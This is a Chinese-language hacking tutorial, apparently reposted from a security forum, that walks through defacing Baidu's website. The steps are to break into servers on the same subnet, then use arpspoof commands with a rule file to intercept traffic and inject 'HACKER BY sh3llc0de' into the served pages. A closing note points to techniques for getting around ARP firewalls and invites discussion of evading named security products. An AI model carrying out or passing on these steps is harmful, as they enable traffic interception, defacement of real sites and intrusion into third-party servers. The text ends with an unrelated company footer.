比如我们要改百度的页面,哪么我们怎么做呢
我们要先PING出百度的IP地址,然后在这个IP附近找同一个网段的服务器挨个入侵,就是通常说的C段,就会和百度在同一个交换机下了,然后使用我们提供的软件进行页面更改。看我的命令:
arpspoof /i 列出网卡数,记下序号,
arpspoof /n 生成一个JOB.txt 这是规则文本,你可以使用TYPE来查看,并在里面加上HACKER BY sh3llc0de的字样
arpspoof.exe 百度的IP 网关地址 80 0 0 /r job.txt 注意第一个0 就是刚才列出网卡数时的序号,后一个0表示单向欺骗
意思就是说现在所有网关发给百度的数据都会经过我控制的这台电脑,不满足我们指定规则的数据会直接被转发出去,
这里百度网站上的数据就会被改了,当你在访问百度就发现百度被黑了!当然这个只是在没有ARP防火墙的情况下 假如有ARP防火墙 ARP欺骗包被拦截了怎么办呢?可以参考91ri.org的《快速发包突破ARP防火墙思路》
This is just arp
91ri.org:ARP攻击的手法我们也介绍不止一次了 在Win平台比较出名的有Cain等,Linux平台较为出名的有ettercap等,目前突破ARP防火墙的方法公开的有:1.伪造IP及MAC 2.快速发包 等。不过这些方法很容易造成目标当机,其实针对目前市场上主流的几款防火墙 如:彩影 360 贝壳 等 还是有对付他们的特殊办法 有兴趣探讨突破ARP防火墙的办法的朋友留言哟 O(∩_∩)O~
本文作者Sh3llc0de@落泪红尘 由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处!
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号